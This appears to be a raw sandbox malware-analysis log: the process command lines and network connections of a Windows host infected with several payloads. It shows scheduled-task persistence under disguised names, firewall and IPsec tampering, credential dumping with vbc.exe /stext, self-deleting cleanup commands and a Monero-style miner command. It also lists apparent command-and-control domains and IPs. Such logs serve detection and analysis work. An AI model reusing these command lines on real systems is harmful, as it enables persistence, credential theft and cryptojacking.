C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filterlist name=Filter1

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp"

C:\Users\Admin\AppData\Roaming\mediaget.exe

"C:\Users\Admin\AppData\Roaming\mediaget.exe"

C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe

C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240629765.txt",MainThread

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\schtasks.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP

C:\Windows\Resources\Ease of Access Themes\schtasks.exe

"C:\Windows\Resources\Ease of Access Themes\schtasks.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filteraction name=FilteraAtion1 action=block

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static set policy name=Block assign=y

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 1340

C:\Windows\SysWOW64\PING.EXE

ping -n 2 127.0.0.1

C:\Windows\Help\Winlogon.exe

C:\Windows\Help\Winlogon.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\Cursors\WUDFhosts.exe

C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x

C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1372 -ip 1372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\\svchost.exe

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul

C:\Users\Admin\AppData\Local\Temp\svchos.exe

C:\Users\Admin\AppData\Local\Temp\\svchos.exe

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -acsi

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9757c46f8,0x7ff9757c4708,0x7ff9757c4718

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Windows\SysWOW64\PING.EXE

ping -n 2 127.0.0.1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:8

C:\Users\Admin\Downloads\HitmanPro_x64.exe

"C:\Users\Admin\Downloads\HitmanPro_x64.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4768 /prefetch:2

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3780 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2344 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.19.222.79:80 whatismyipaddress.com tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 104.19.222.79:443 whatismyipaddress.com tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 yabynennet.xyz udp
US 104.155.138.21:81 yabynennet.xyz tcp
US 8.8.8.8:53 79.222.19.104.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 21.138.155.104.in-addr.arpa udp
CN 59.56.110.231:8898 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
RU 92.63.107.12:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 92.63.107.12:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
MD 194.180.174.53:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 pretorian.ac.ug udp
US 8.8.8.8:53 pretorian.ac.ug udp
US 8.8.8.8:53 prepepe.ac.ug udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 22ssh.com udp
US 8.8.8.8:53 pool.usa-138.com udp
SG 45.77.45.115:80 pool.usa-138.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 115.45.77.45.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
MD 194.180.174.53:80 tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 files.000webhost.com udp
HU 91.219.236.18:80 91.219.236.18 tcp
US 8.8.8.8:53 18.236.219.91.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
MD 194.180.174.41:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 22ssh.com udp
MD 194.180.174.41:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
HU 91.219.236.148:80 tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
HU 91.219.236.148:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 184.143.101.95.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 88.221.135.57:443 r.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
US 8.8.8.8:53 57.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 182.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 bing.com udp
US 13.107.21.200:443 bing.com tcp
US 13.107.21.200:443 bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.68:443 login.microsoftonline.com tcp
US 8.8.8.8:53 200.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
RU 80.87.192.115:80 tcp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
N/A 127.0.0.1:58491 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:58491 tcp
N/A 127.0.0.1:58491 tcp
US 8.8.8.8:53 google.com udp
GB 142.250.187.238:80 google.com tcp
GB 142.250.187.238:80 google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 172.217.16.228:80 www.google.com tcp
GB 172.217.16.228:80 www.google.com tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 support.google.com udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
GB 95.101.143.184:443 www.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 www.hitmanpro.com udp
GB 184.28.198.162:443 www.hitmanpro.com tcp
GB 184.28.198.162:443 www.hitmanpro.com tcp
US 8.8.8.8:53 162.198.28.184.in-addr.arpa udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 pricingapi.cleverbridge.com udp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 172.64.155.119:443 geolocation.onetrust.com tcp
US 104.16.243.229:443 pricingapi.cleverbridge.com tcp
GB 184.28.198.162:443 www.hitmanpro.com tcp
US 8.8.8.8:53 42.87.18.104.in-addr.arpa udp
US 8.8.8.8:53 119.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 229.243.16.104.in-addr.arpa udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 sophos-privacy.my.onetrust.com udp
US 172.64.155.119:443 sophos-privacy.my.onetrust.com tcp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 184.28.198.162:443 www.hitmanpro.com tcp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 download.sophos.com udp
GB 2.21.185.132:443 download.sophos.com tcp
GB 2.21.185.132:443 download.sophos.com tcp
US 8.8.8.8:53 132.185.21.2.in-addr.arpa udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 files.surfright.nl udp
US 8.8.8.8:53 scan.hitmanpro.com udp
NL 185.105.204.28:443 files.surfright.nl tcp
NL 52.174.35.5:80 scan.hitmanpro.com tcp
US 8.8.8.8:53 28.204.105.185.in-addr.arpa udp
US 8.8.8.8:53 5.35.174.52.in-addr.arpa udp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 remnants.hitmanpro.com udp
US 185.228.168.9:53 8.8.8.8.zen.spamhaus.org udp
NL 23.97.160.56:443 remnants.hitmanpro.com tcp
US 8.8.8.8:53 9.168.228.185.in-addr.arpa udp
US 8.8.8.8:53 56.160.97.23.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 hash.hitmanpro.com udp
NL 23.97.160.56:443 hash.hitmanpro.com tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
